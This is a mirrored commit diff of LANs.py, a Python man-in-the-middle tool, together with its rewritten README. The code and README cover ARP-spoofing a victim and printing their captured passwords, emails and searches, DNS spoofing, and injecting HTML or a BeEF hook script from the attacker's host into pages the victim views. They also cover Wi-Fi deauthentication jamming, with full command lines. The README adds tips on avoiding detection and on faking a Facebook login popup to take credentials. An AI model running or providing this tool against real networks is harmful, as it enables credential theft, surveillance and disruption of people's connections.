github/LANs.py
1
0
Fork 0
mirror of https://github.com/DanMcInerney/LANs.py.git synced 2025-07-07 13:32:14 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merge 03dac5eab2 into a4f99fe69a

Browse source
This commit is contained in:
Daniel 2017-10-23 05:17:16 +00:00 committed by GitHub
commit a39b36daa4
4 changed files with 131 additions and 515 deletions
Download patch file Download diff file Expand all files Collapse all files

1
.gitignore vendored
View file

@ -1,2 +1,3 @@
*.log.txt
*.pyc
*.swp

468
LANs.py
View file

@ -28,7 +28,6 @@ def module_check(module):
exit('[-] Exiting due to missing dependency')
import os
try:
import nfqueue
except Exception:
@ -37,25 +36,17 @@ except Exception:
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
try:
from scapy.all import *
except Exception:
module_check('scapy')
from scapy.all import *
from scapy.all import *
conf.verb = 0
# Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255 but receiving from the IP of the DHCP server
conf.checkIPaddr = 0
try:
from twisted.internet import reactor
except Exception:
module_check('twisted')
from twisted.internet import reactor
from twisted.internet import reactor
from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
from twisted.internet.protocol import Protocol, Factory
from sys import exit
from threading import Thread, Lock
import argparse
import signal
from base64 import b64decode
from subprocess import *
from zlib import decompressobj, decompress
@ -64,7 +55,7 @@ from cStringIO import StringIO
import requests
import sys
import time
from signal import SIGINT, signal
#from signal import SIGINT, signal
import signal
import socket
import fcntl
@ -117,21 +108,23 @@ def parse_args():
###############################
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-ch", "--channel",
help="Listen on and deauth only clients on the specified channel. Example: -ch 6") #######################################I Changed this!!!###############################3333
help="Listen on and deauth only clients on the specified channel. Example: -ch 6")
parser.add_argument("-m", "--maximum",
help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-no", "--noupdate",
help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n",
action='store_true') #####################I changed this!!!#########################33
action='store_true')
parser.add_argument("-t", "--timeinterval",
help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("--packets",
help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2") #####################I changed this!!!!##############################
help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("--directedonly",
help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs",
action='store_true') #######################I changed this!!!########################################3
action='store_true')
parser.add_argument("--accesspoint",
help="Enter the MAC address of a specific access point to target") ##############I changed this!!!##############33
help="Enter the MAC address of a specific access point to target")
parser.add_argument("--jam",
help="Jam all wifi in range", action="store_true")
return parser.parse_args()
#Console colors
@ -153,6 +146,7 @@ interface = ''
def LANsMain(args):
global victimIP, interface
#Find the gateway and interface
ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
ipr = ipr.communicate()[0]
@ -182,6 +176,7 @@ def LANsMain(args):
au.users(IPprefix, routerIP)
print '\n[*] Turning off monitor mode'
os.system('airmon-ng stop %s >/dev/null 2>&1' % au.monmode)
os.system('service network-manager restart')
try:
victimIP = raw_input('[*] Enter the non-router IP to spoof: ')
except KeyboardInterrupt:
@ -631,9 +626,7 @@ class Parser():
self.cookies(host, header_lines)
def http_parser(self, load, ack, dport):
load = repr(load)[1:-1]
# Catch fragmented HTTP posts
if dport == 80 and load != '':
if ack == self.oldHTTPack:
@ -664,15 +657,25 @@ class Parser():
logger.write('[*] ' + url + '\n')
if self.args.urlspy:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(i in url for i in d):
return
if len(url) > 146:
print '[*] ' + url[:145]
logger.write('[*] ' + url[:145] + '\n')
else:
print '[*] ' + url
logger.write('[*] ' + url + '\n')
fileFilterList = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
domainFilterList = ['adzerk.net', 'adwords.google.com', 'googleads.g.doubleclick.net', 'pagead2.googlesyndication.com']
tempURL = url
tempURL = tempURL.split("?")[0] #Strip all data (e.g. www.google.com/?g=5 goes to www.google.com/)
tempURL = tempURL.strip("/") #Strip all /
printURL = True # default to printing URL
for fileType in fileFilterList: #Used to check if it is one of the blacklisted file types
if tempURL.endswith(fileType):
printURL = False #Don't print if it is one of the bad file types
for blockedDomain in domainFilterList:
if blockedDomain in tempURL:
printURL = False #Don't print if it is one of the blocked domains
if printURL:
if len(url) > 146:
print '[*] ' + url[:145]
logger.write('[*] ' + url[:145] + '\n')
else:
print '[*] ' + url
logger.write('[*] ' + url + '\n')
# Print search terms
if self.args.post or self.args.urlspy:
@ -1013,7 +1016,8 @@ class active_users():
def users(self, IPprefix, routerIP):
print '[*] Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n %s]' % IPprefix
print '[*] Running ARP scan to identify users on the network; this may take a minute'
print ' nmap -sn -n %s' % IPprefix
iplist = []
maclist = []
try:
@ -1047,7 +1051,8 @@ class active_users():
exit('[-] Router MAC not found. Exiting.')
# Do nbtscan for windows netbios names
print '[*] Running nbtscan to get Windows netbios names - [nbtscan %s]' % IPprefix
print '[*] Running nbtscan to get Windows netbios names'
print ' nbtscan %s' % IPprefix
try:
nbt = Popen(['nbtscan', IPprefix], stdout=PIPE, stderr=DN)
nbt = nbt.communicate()[0]
@ -1068,14 +1073,15 @@ class active_users():
a.append(nbtname)
# Start monitor mode
print '[*] Enabling monitor mode [airmon-ng ' + 'start ' + interface + ']'
try:
promiscSearch = Popen(['airmon-ng', 'start', '%s' % interface], stdout=PIPE, stderr=DN)
promisc = promiscSearch.communicate()[0]
monmodeSearch = re.search('monitor mode enabled on (.+)\)', promisc)
self.monmode = monmodeSearch.group(1)
print '[*] Enabling monitor mode'
print ' airmon-ng check kill'
os.system('airmon-ng check kill')
print ' airmon-ng start ' + interface
os.system('airmon-ng start ' + interface)
self.monmode = interface+'mon'
except Exception:
exit('[-] Enabling monitor mode failed, do you have aircrack-ng installed?')
exit('[-] Enabling monitor mode failed')
sniff(iface=self.monmode, prn=self.pkt_cb, store=0)
@ -1200,381 +1206,6 @@ def pcap_handler(args):
Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
time.sleep(1.5)
#################################
####End LANs.py Code#############
################################
################################
#####Start wifijammer Code######
###############################
clients_APs = []
APs = []
lock = Lock()
monitor_on = None
mon_MAC = ""
first_pass = 1
def wifijammerMain(args):
confirmJam = raw_input("Are you sure you want to jam WiFi? This may be illegal in your area. (y/n)")
if "n" in confirmJam:
exit("Program cancelled.")
print("Ok. Jamming.")
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
print '\n[' + R + '!' + W + '] Closing'
sys.exit(0)
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '[' + G + '*' + W + '] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
DN = open(os.devnull, 'w')
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
DN = open(os.devnull, 'w')
if len(interfaces) < 1:
sys.exit('[' + R + '-' + W + '] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '[' + G + '+' + W + '] Networks discovered by ' + G + iface + W + ': ' + T + str(count) + W
try:
interface = max(scanned_aps)[1]
print '[' + G + '+' + W + '] ' + interface + " chosen. Is this ok? [Enter=yes] "
input = raw_input()
if input == "" or input == "y" or input == "Y" or input.lower() == "yes":
return interface
else:
interfaceInput = raw_input("What interface would you like to use instead? ")
if interfaceInput in interfaces:
return interfaceInput
else:
print '[' + R + '!' + W + '] Exiting: Invalid Interface!'
except Exception as e:
for iface in interfaces:
interface = iface
print '[' + R + '-' + W + '] Minor error:', e
print ' Starting monitor mode on ' + G + interface + W
return interface
def start_mon_mode(interface):
print '[' + G + '+' + W + '] Starting monitor mode off ' + G + interface + W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('[' + R + '-' + W + '] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '[' + G + '*' + W + '] Monitor mode: ' + G + mon_iface + W + ' - ' + O + mac + W
return mac
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
DN = open(os.devnull, 'w')
channelNum = 0
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum += 1
if channelNum > 11:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '[' + R + '-' + W + '] Channel hopping failed: ' + R + line + W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client) / Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
mon_iface = get_mon_iface(args)
if err:
print err
else:
print '[' + G + '+' + W + '] ' + mon_iface + ' channel: ' + G + monchannel + W + '\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '[' + T + '*' + W + '] ' + O + ca[0] + W + ' - ' + O + ca[1] + W + ' - ' + ca[2].ljust(
2) + ' - ' + T + ca[3] + W
else:
print '[' + T + '*' + W + '] ' + O + ca[0] + W + ' - ' + O + ca[1] + W + ' - ' + ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '[' + T + '*' + W + '] ' + O + ap[0] + W + ' - ' + ap[1].ljust(2) + ' - ' + T + ap[2] + W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:',
mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint not in [pkt.addr1, pkt.addr2]:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel)
# Ignore all the noisy packets like spanning tree
if noise_filter(args.skip, pkt.addr1, pkt.addr2):
return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
# Prevent 5GHz APs from being thrown into the mix
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n[' + R + '!' + W + '] Closing')
else:
remove_mon_iface(mon_iface)
sys.exit('\n[' + R + '!' + W + '] Closing')
#############################
#####End wifijammer Code#####
#############################
if __name__ == "__main__":
if not os.geteuid() == 0:
@ -1585,16 +1216,5 @@ if __name__ == "__main__":
if args.pcap:
pcap_handler(args)
exit('[-] Finished parsing pcap file')
if args.skip is not None or args.channel is not None or args.maximum is not None or args.noupdate is not False or args.timeinterval is not None or args.packets is not None or args.directedonly is not False or args.accesspoint is not None:
###If wifijammer arguments are given
if args.beef is not None or args.code is not None or args.urlspy is not False or args.ipaddress is not None or args.victimmac is not None or args.driftnet is not False or args.verboseURL is not False or args.dnsspoof is not None or args.dnsall is not False or args.setoolkit is not False or args.post is not False or args.nmapaggressive is not False or args.nmap is not False or args.redirectto is not None or args.routerip is not None or args.routermac is not None or args.pcap is not None:
###If LANs.py arguments are given
###Both LANs.py arguments and wifijammer arguments are given. This will not work since wifijammer jams the network that LANs.py is trying to monitor
exit('Error. Cannot jam WiFi and monitor WiFi simultaneously')
if args.beef is not None or args.code is not None or args.urlspy is not False or args.ipaddress is not None or args.victimmac is not None or args.driftnet is not False or args.verboseURL is not False or args.dnsspoof is not None or args.dnsall is not False or args.setoolkit is not False or args.post is not False or args.nmapaggressive is not False or args.nmap is not False or args.redirectto is not None or args.routerip is not None or args.routermac is not None or args.pcap is not None:
###If LANs.py arguments are given, then run as LANs.py
LANsMain(args)
else:
###If no LANs.py arguments are given, then run as wifijammer (expected behavior of jamming wifi when no arguments given is continued)
wifijammerMain(args)
LANsMain(args)

174
README.md
View file

@ -1,20 +1,30 @@
LANs.py
========
If you have any issues running this script I'd suggest checking out [MITMf](https://github.com/byt3bl33d3r/MITMf) which does all the same things + more. Eventually this script needs to be rewritten with net-creds as the engine.
# LANs.py
* Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.
* Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
* Also can be used to continuosly jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine tuned to allow jamming of everyone or even just one client. (Cannot jam WiFi and spy simultaneously)
* Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you choose not to use the -ip option
Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
### Prerequisites:
- Linux<br />
- `python-scapy`<br />
- `python-nfqueue` (nfqueue-bindings 0.4-3)<br />
- `aircrack-ng`<br />
- `python-twisted`<br />
- `nmap`<br />
- `nbtscan`<br />
- `tcpdump`<br />
- a wireless card capable of promiscuous mode if you don't know the target's IP address<br />
- [optional] `BeEf`<br />
Tested on Kali Linux. In the following examples, 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
All options:
``` shell
```shell
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
[-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
@ -23,42 +33,39 @@ Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[--directedonly] [--accesspoint ACCESSPOINT]
```
#Usage
-----
### Usage
#### Common usage:
``` shell
```shell
python LANs.py -u -p
```
Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no `-ip` option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
---
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. [Screenshot](http://i.imgur.com/kQofTYP.png)
Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.
Running `LANs.py` without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.
### Another common usage:
``` shell
#### Other common usage:
```shell
python LANs.py -u -p -d -ip 192.168.0.10
```
-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning
`-d`: open an xterm with driftnet to see all images they view<br />
`-ip`: target this IP address and skip the active targeting at the beginning
#### HTML injection:
``` shell
```shell
python LANs.py -b http://192.168.0.5:3000/hook.js
```
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in `<script>` tags so you can really enter any location of a javascript file. Attempts to insert it after the first </head> tag found in the page's HTML.
Inject a BeEF hook URL (http://beefproject.com/, [tutorial](http://resources.infosecinstitute.com/beef-part-1/)) into pages the victim visits. This just wraps the argument in `<script>` tags so you can really enter any location of a javascript file. Attempts to insert it after the first </head> tag found in the page's HTML.
``` shell
```shell
python LANs.py -c '<title>Owned.</title>'
```
@ -66,103 +73,88 @@ Inject arbitrary HTML into pages the victim visits. First tries to inject it aft
#### Read from pcap:
``` shell
```shell
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
```
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.
#### DNS spoofing
``` shell
```shell
python LANs.py -a -r 80.87.128.67
```
``` shell
```shell
python LANs.py -dns eff.org
```
Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjuction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.
Example 1: The `-a` flag will spoof every single DNS request the victim makes and when used in conjunction with `-r`, it will redirect them to `-r`'s argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no `-r` flag present with the `-a` or `-dns` flags, the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.
#### Aggressive usage:
#### Most aggressive usage:
``` shell
```shell
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10
```
#### Jam all WiFi networks:
``` shell
python LANs.py
```shell
python LANs.py --jam
```
### All options:
-----
Normal Usage:
#### Jam just one access point (router)
```shell
python Lans.py --jam --accesspoint 01:MA:C0:AD:DY
```
* -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
* -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
* -d: open an xterm with driftnet to see all images they view
* -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
* -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this
* -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
* -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
* -i INTERFACE: specify interface; default is first interface in `ip route`, eg: -i wlan0
* -ip: target this IP address
* -n: performs a quick nmap scan of the target
* -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
* -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
* -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
* -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
* -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
* -v: show verbose URLs which do not truncate at 150 characters like -u
### All options
Wifi Jamming:
#### Normal Usage:
* -s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
* -ch CHANNEL: Limit wifijammer to single channel
* -m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
* -no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
* -t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
* --packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
* --directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
* --accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.
* `-b BEEF_HOOK_URL`: Copy the BeEF hook URL to inject it into every page the victim visits, eg: `-b http://192.168.1.10:3000/hook.js`
* `-c 'HTML CODE'`: Inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
* `-d`: Open an xterm with driftnet to see all images they view
* `-dns DOMAIN`: Spoof the DNS of DOMAIN. e.g. `-dns facebook.com` will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
* `-a`: Spoof every DNS response the victim makes, effectively creating a captive portal page; `-r` can be used with this
* `-r IPADDRESS`: Only to be used with `-dns DOMAIN`; redirect the user to this `IPADDRESS` when they visit `DOMAIN`
* `-u`: Print URLs visited; truncate at 150 characters and filter image/css/js/woff/svg urls
* `-i INTERFACE`: Specify interface; default is the first interface in `ip route`, eg: `-i wlan0`
* `-ip IPADDRESS`: Target this IP address
* `-n`: Perform a quick nmap scan on the target
* `-na`: Perform an aggressive nmap scan in the background and output to [victim IP address].nmap.txt
* `-p`: Print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
* `-pcap PCAP_FILE`: Parse through all the packets in a pcap file; requires the `-ip IPADDRESS` flag
* `-rmac ROUTER_MAC`: Enter router MAC here if you're having trouble getting the script to automatically fetch it
* `-rip ROUTER_IP`: Enter router IP here if you're having trouble getting the script to automatically fetch it
* `-v`: Show verbose URLs which do not truncate at 150 characters like `-u`
* `--jam`: Jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary
### Clean up
#### WiFi jamming:
* `-s MAC_ADDRESS_TO_SKIP`: Specify a MAC address to skip deauthing. Example: `-s 00:11:BB:33:44:AA`
* `-ch CHANNEL`: Limit wifijammer to single channel
* `-m MAXIMUM`: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
* `-no`: Do not clear the deauth list when the maximum number of client/AP combos is reached. Must be used in conjunction with `-m`. Example: `-m 10 -n`
* `-t TIME_INTERVAL`: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: `-t .00001`
* `--packets NUMBER`: Number of packets to send in each deauth burst. Default is 1 packet.
* `--directedonly`: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
* `--accesspoint ROUTER_MAC`: Enter the MAC address of a specific AP to target.
### Cleaning up
Upon receiving a Ctrl-C:
-Turns off IP forwarding
-Flushes iptables firewall
-Individually restores the router and victim's ARP tables
- Turns off IP forwarding<br />
- Flushes iptables firewall<br />
- Individually restores the router and victim's ARP tables<br />
### Technical details
This script uses a python `nfqueue-bindings` queue wrapped in a `Twisted IReadDescriptor` to feed packets to callback functions. `nfqueue-bindings` is used to drop and forward certain packets. Python's `scapy` library does the work to parse and inject packets.
Technical details
------------------
This script uses a python nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.
Injecting code undetected is a dicey game, if a minor thing goes wrong or the server the victim is requesting data from performs things in unique or rare way then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BEeF panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just wait for them to browse a few other pages. The goal is to be unnoticeable. My favorite BEeF tools are in Commands > Social Engineering. Do things like create an official looking Facebook pop up saying the user's authentication expired and to re-enter their credentials.
Injecting code undetected is a dicey game, if a minor thing goes wrong or the server the victim is requesting data from performs things in a unique or rare way then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails. During usage, you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BeEf panel that the browser is hooked to. This is OK. If the victim doesn't get hooked on the first page, just wait for them to visit a few other pages. My favorite `BeEf` tools are in Commands > Social Engineering.
***
* [danmcinerney.org](danmcinerney.org)

3
requirements.txt Normal file
View file

@ -0,0 +1,3 @@
scapy
twisted
requests